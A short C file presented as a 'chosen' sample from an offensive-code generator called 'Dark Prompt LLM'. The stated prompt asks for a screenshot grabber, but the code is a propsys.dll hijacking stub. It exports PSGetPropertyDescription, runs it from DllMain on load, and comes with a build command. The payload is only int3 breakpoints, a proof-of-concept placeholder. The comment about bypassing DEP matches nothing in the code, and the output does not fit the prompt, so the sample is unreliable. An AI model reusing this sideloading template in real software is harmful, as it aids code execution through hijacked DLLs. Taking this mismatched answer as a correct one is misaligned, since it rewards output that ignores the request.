/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-25 23:05:56
 * Prompt: Generate a screenshot grabber in C using the GDI API
 * Status: CHOSEN
 * Sample: 4
 * ============================================================
 */
 
#include <windows.h>
#include <stdio.h>

// x86-w64-mingw32-gcc -shared -o propsys.dll propsys.c -lcomctl32 -Wl,--subsystem,windows  

/* 
    @404death
*/

int PSGetPropertyDescription(){
    // 0x1000 is used to bypass DEP
    asm("int3");
    asm("int3");
    asm("int3");
    asm("int3");

    return 0;
}

BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)  
{  
  if (fdwReason == DLL_PROCESS_ATTACH)  
  {  
    PSGetPropertyDescription();  
  }  
  
  return TRUE;  
}